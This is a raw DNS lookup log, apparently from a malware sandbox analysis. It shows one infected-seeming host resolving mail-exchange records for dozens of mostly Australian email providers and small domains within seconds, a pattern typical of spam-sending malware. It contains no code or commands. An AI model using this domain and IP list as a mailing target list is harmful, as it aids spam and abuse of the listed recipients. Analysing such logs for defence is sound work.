                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.719996929 CET8.8.8.8192.168.2.30x48ccNo error (0)capitalchemist.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.755105972 CET8.8.8.8192.168.2.30x167eNo error (0)banksgroup-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.755105972 CET8.8.8.8192.168.2.30x167eNo error (0)banksgroup-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.958960056 CET8.8.8.8192.168.2.30xfac5No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.958960056 CET8.8.8.8192.168.2.30xfac5No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.958960056 CET8.8.8.8192.168.2.30xfac5No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.969049931 CET8.8.8.8192.168.2.30x44ccNo error (0)capitalchemist-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.969049931 CET8.8.8.8192.168.2.30x44ccNo error (0)capitalchemist-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.981363058 CET8.8.8.8192.168.2.30xaafbNo error (0)g.austincc.eduMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.981363058 CET8.8.8.8192.168.2.30xaafbNo error (0)g.austincc.eduMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.981363058 CET8.8.8.8192.168.2.30xaafbNo error (0)g.austincc.eduMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.981363058 CET8.8.8.8192.168.2.30xaafbNo error (0)g.austincc.eduMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.981363058 CET8.8.8.8192.168.2.30xaafbNo error (0)g.austincc.eduMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.981363058 CET8.8.8.8192.168.2.30xaafbNo error (0)g.austincc.eduMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.981363058 CET8.8.8.8192.168.2.30xaafbNo error (0)g.austincc.eduMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.983649969 CET8.8.8.8192.168.2.30x2b0dNo error (0)mta5.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.983649969 CET8.8.8.8192.168.2.30x2b0dNo error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.983649969 CET8.8.8.8192.168.2.30x2b0dNo error (0)mta5.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.983649969 CET8.8.8.8192.168.2.30x2b0dNo error (0)mta5.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.983649969 CET8.8.8.8192.168.2.30x2b0dNo error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.983649969 CET8.8.8.8192.168.2.30x2b0dNo error (0)mta5.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.983649969 CET8.8.8.8192.168.2.30x2b0dNo error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.983649969 CET8.8.8.8192.168.2.30x2b0dNo error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.028821945 CET8.8.8.8192.168.2.30xabc1No error (0)ASPMX.L.google.com142.251.31.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.049276114 CET8.8.8.8192.168.2.30xf093No error (0)amf.org.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.104787111 CET8.8.8.8192.168.2.30x38c3No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.104787111 CET8.8.8.8192.168.2.30x38c3No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.104787111 CET8.8.8.8192.168.2.30x38c3No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.115350962 CET8.8.8.8192.168.2.30xd967No error (0)thelastfrontier.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.115396023 CET8.8.8.8192.168.2.30x90c5No error (0)amf-org-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.115396023 CET8.8.8.8192.168.2.30x90c5No error (0)amf-org-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.128643990 CET8.8.8.8192.168.2.30x7714No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.128643990 CET8.8.8.8192.168.2.30x7714No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.128643990 CET8.8.8.8192.168.2.30x7714No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.128643990 CET8.8.8.8192.168.2.30x7714No error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.128643990 CET8.8.8.8192.168.2.30x7714No error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.128643990 CET8.8.8.8192.168.2.30x7714No error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.128643990 CET8.8.8.8192.168.2.30x7714No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.128643990 CET8.8.8.8192.168.2.30x7714No error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.343457937 CET8.8.8.8192.168.2.30xa8bcNo error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.357880116 CET8.8.8.8192.168.2.30x13d1No error (0)mail.thelastfrontier.com.au173.254.28.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.371558905 CET8.8.8.8192.168.2.30x9dfcNo error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.468184948 CET8.8.8.8192.168.2.30x7eb2No error (0)swiftdsl.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.468184948 CET8.8.8.8192.168.2.30x7eb2No error (0)swiftdsl.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.570435047 CET8.8.8.8192.168.2.30x3db7No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.570435047 CET8.8.8.8192.168.2.30x3db7No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.570435047 CET8.8.8.8192.168.2.30x3db7No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.593822956 CET8.8.8.8192.168.2.30x30e3No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.593822956 CET8.8.8.8192.168.2.30x30e3No error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.593822956 CET8.8.8.8192.168.2.30x30e3No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.593822956 CET8.8.8.8192.168.2.30x30e3No error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.593822956 CET8.8.8.8192.168.2.30x30e3No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.593822956 CET8.8.8.8192.168.2.30x30e3No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.593822956 CET8.8.8.8192.168.2.30x30e3No error (0)mta6.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.593822956 CET8.8.8.8192.168.2.30x30e3No error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.615453959 CET8.8.8.8192.168.2.30xe4a8No error (0)hotkey.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.615453959 CET8.8.8.8192.168.2.30xe4a8No error (0)hotkey.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.659050941 CET8.8.8.8192.168.2.30xe1baNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.659050941 CET8.8.8.8192.168.2.30xe1baNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.659050941 CET8.8.8.8192.168.2.30xe1baNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.694304943 CET8.8.8.8192.168.2.30xe6e9No error (0)mx.syd.iprimus.com.au203.134.71.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.694653988 CET8.8.8.8192.168.2.30x2120No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.694653988 CET8.8.8.8192.168.2.30x2120No error (0)mta7.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.694653988 CET8.8.8.8192.168.2.30x2120No error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.694653988 CET8.8.8.8192.168.2.30x2120No error (0)mta7.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.694653988 CET8.8.8.8192.168.2.30x2120No error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.694653988 CET8.8.8.8192.168.2.30x2120No error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.694653988 CET8.8.8.8192.168.2.30x2120No error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.694653988 CET8.8.8.8192.168.2.30x2120No error (0)mta7.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.704468012 CET8.8.8.8192.168.2.30xb68aNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.704468012 CET8.8.8.8192.168.2.30xb68aNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.704468012 CET8.8.8.8192.168.2.30xb68aNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.769882917 CET8.8.8.8192.168.2.30x1db8No error (0)ipt-mailgate-01.m2core.com.au203.134.71.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.870207071 CET8.8.8.8192.168.2.30xe711No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.870207071 CET8.8.8.8192.168.2.30xe711No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.870207071 CET8.8.8.8192.168.2.30xe711No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.870207071 CET8.8.8.8192.168.2.30xe711No error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.870207071 CET8.8.8.8192.168.2.30xe711No error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.870207071 CET8.8.8.8192.168.2.30xe711No error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.870207071 CET8.8.8.8192.168.2.30xe711No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.870207071 CET8.8.8.8192.168.2.30xe711No error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:23.959805012 CET8.8.8.8192.168.2.30xf3afNo error (0)hardingmedia.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.100584984 CET8.8.8.8192.168.2.30x11a2No error (0)brookesfamily.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.100584984 CET8.8.8.8192.168.2.30x11a2No error (0)brookesfamily.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.154613972 CET8.8.8.8192.168.2.30xe042No error (0)ozemail.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.155863047 CET8.8.8.8192.168.2.30x9f91No error (0)mx01.mail.icloud.com17.57.156.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.155863047 CET8.8.8.8192.168.2.30x9f91No error (0)mx01.mail.icloud.com17.56.9.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.155863047 CET8.8.8.8192.168.2.30x9f91No error (0)mx01.mail.icloud.com17.42.251.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.155863047 CET8.8.8.8192.168.2.30x9f91No error (0)mx01.mail.icloud.com17.57.152.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.155863047 CET8.8.8.8192.168.2.30x9f91No error (0)mx01.mail.icloud.com17.57.154.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.155863047 CET8.8.8.8192.168.2.30x9f91No error (0)mx01.mail.icloud.com17.57.155.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.221834898 CET8.8.8.8192.168.2.30x95b2No error (0)up2date.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.221834898 CET8.8.8.8192.168.2.30x95b2No error (0)up2date.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.221834898 CET8.8.8.8192.168.2.30x95b2No error (0)up2date.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.221834898 CET8.8.8.8192.168.2.30x95b2No error (0)up2date.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.225395918 CET8.8.8.8192.168.2.30xdbb8No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.268286943 CET8.8.8.8192.168.2.30xd0eaNo error (0)hardingmedia.com.au182.160.153.182A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.329097986 CET8.8.8.8192.168.2.30xf411No error (0)exemail.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.329097986 CET8.8.8.8192.168.2.30xf411No error (0)exemail.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.329097986 CET8.8.8.8192.168.2.30xf411No error (0)exemail.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.341917992 CET8.8.8.8192.168.2.30x9c31Name error (3)echowebhosting.com.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.353897095 CET8.8.8.8192.168.2.30x293cNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.353897095 CET8.8.8.8192.168.2.30x293cNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.353897095 CET8.8.8.8192.168.2.30x293cNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.357070923 CET8.8.8.8192.168.2.30x8521No error (0)lastmx.spamexperts.net149.13.75.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.357070923 CET8.8.8.8192.168.2.30x8521No error (0)lastmx.spamexperts.net38.111.198.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.357070923 CET8.8.8.8192.168.2.30x8521No error (0)lastmx.spamexperts.net38.89.254.156A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.357070923 CET8.8.8.8192.168.2.30x8521No error (0)lastmx.spamexperts.net130.117.53.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.394113064 CET8.8.8.8192.168.2.30x1ee8No error (0)up2date-com-au.p20.mxthunder.net209.41.68.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.479566097 CET8.8.8.8192.168.2.30xd58fNo error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.479566097 CET8.8.8.8192.168.2.30xd58fNo error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.479566097 CET8.8.8.8192.168.2.30xd58fNo error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.479566097 CET8.8.8.8192.168.2.30xd58fNo error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.479566097 CET8.8.8.8192.168.2.30xd58fNo error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.479566097 CET8.8.8.8192.168.2.30xd58fNo error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.479566097 CET8.8.8.8192.168.2.30xd58fNo error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.479566097 CET8.8.8.8192.168.2.30xd58fNo error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.517628908 CET8.8.8.8192.168.2.30x5271No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.517628908 CET8.8.8.8192.168.2.30x5271No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.517628908 CET8.8.8.8192.168.2.30x5271No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.517668962 CET8.8.8.8192.168.2.30x749dNo error (0)activ8.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.517668962 CET8.8.8.8192.168.2.30x749dNo error (0)activ8.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.541127920 CET8.8.8.8192.168.2.30x91c6No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.541127920 CET8.8.8.8192.168.2.30x91c6No error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.541127920 CET8.8.8.8192.168.2.30x91c6No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.541127920 CET8.8.8.8192.168.2.30x91c6No error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.541127920 CET8.8.8.8192.168.2.30x91c6No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.541127920 CET8.8.8.8192.168.2.30x91c6No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.541127920 CET8.8.8.8192.168.2.30x91c6No error (0)mta6.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.541127920 CET8.8.8.8192.168.2.30x91c6No error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.600948095 CET8.8.8.8192.168.2.30x6993No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.600948095 CET8.8.8.8192.168.2.30x6993No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.600948095 CET8.8.8.8192.168.2.30x6993No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.629565001 CET8.8.8.8192.168.2.30xceccNo error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.629565001 CET8.8.8.8192.168.2.30xceccNo error (0)mta5.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.629565001 CET8.8.8.8192.168.2.30xceccNo error (0)mta5.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.629565001 CET8.8.8.8192.168.2.30xceccNo error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.629565001 CET8.8.8.8192.168.2.30xceccNo error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.629565001 CET8.8.8.8192.168.2.30xceccNo error (0)mta5.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.629565001 CET8.8.8.8192.168.2.30xceccNo error (0)mta5.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.629565001 CET8.8.8.8192.168.2.30xceccNo error (0)mta5.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.640286922 CET8.8.8.8192.168.2.30x49a6No error (0)iprimus.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.640286922 CET8.8.8.8192.168.2.30x49a6No error (0)iprimus.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.704852104 CET8.8.8.8192.168.2.30x39b6No error (0)mx.syd.iprimus.com.au203.134.71.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.820657969 CET8.8.8.8192.168.2.30x6725No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.820657969 CET8.8.8.8192.168.2.30x6725No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.820657969 CET8.8.8.8192.168.2.30x6725No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.840354919 CET8.8.8.8192.168.2.30x3fd9No error (0)mx01.activ8.net.au116.250.254.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.847047091 CET8.8.8.8192.168.2.30xc265No error (0)mta5.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.847047091 CET8.8.8.8192.168.2.30xc265No error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.847047091 CET8.8.8.8192.168.2.30xc265No error (0)mta5.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.847047091 CET8.8.8.8192.168.2.30xc265No error (0)mta5.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.847047091 CET8.8.8.8192.168.2.30xc265No error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.847047091 CET8.8.8.8192.168.2.30xc265No error (0)mta5.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.847047091 CET8.8.8.8192.168.2.30xc265No error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:24.847047091 CET8.8.8.8192.168.2.30xc265No error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.071434975 CET8.8.8.8192.168.2.30x6bc2No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:25.071434975 CET8.8.8.8192.168.2.30x6bc2No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
